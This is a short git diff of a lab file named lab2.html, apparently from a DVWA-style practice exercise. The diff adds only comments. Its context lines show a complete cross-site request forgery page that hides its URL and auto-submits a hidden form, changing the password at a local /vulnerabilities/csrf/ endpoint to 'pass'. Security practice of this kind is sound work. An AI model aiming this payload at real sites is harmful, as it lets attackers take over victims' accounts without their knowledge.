uploaded a simple csrf code

--- a/lab2.html
+++ b/lab2.html
@@ -1,7 +1,7 @@
 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
-    <form action="http://127.0.0.1/vulnerabilities/csrf/">
+    <form action="http://127.0.0.1/vulnerabilities/csrf/"> <!-- url link here -->
       <input type="hidden" name="password&#95;new" value="pass" />
       <input type="hidden" name="password&#95;conf" value="pass" />
       <input type="hidden" name="Change" value="Change" />
@@ -10,5 +10,5 @@
     <script>
       document.forms[0].submit();
     </script>
-  </body>
+  </body> <!-- end on body -->
 </html>
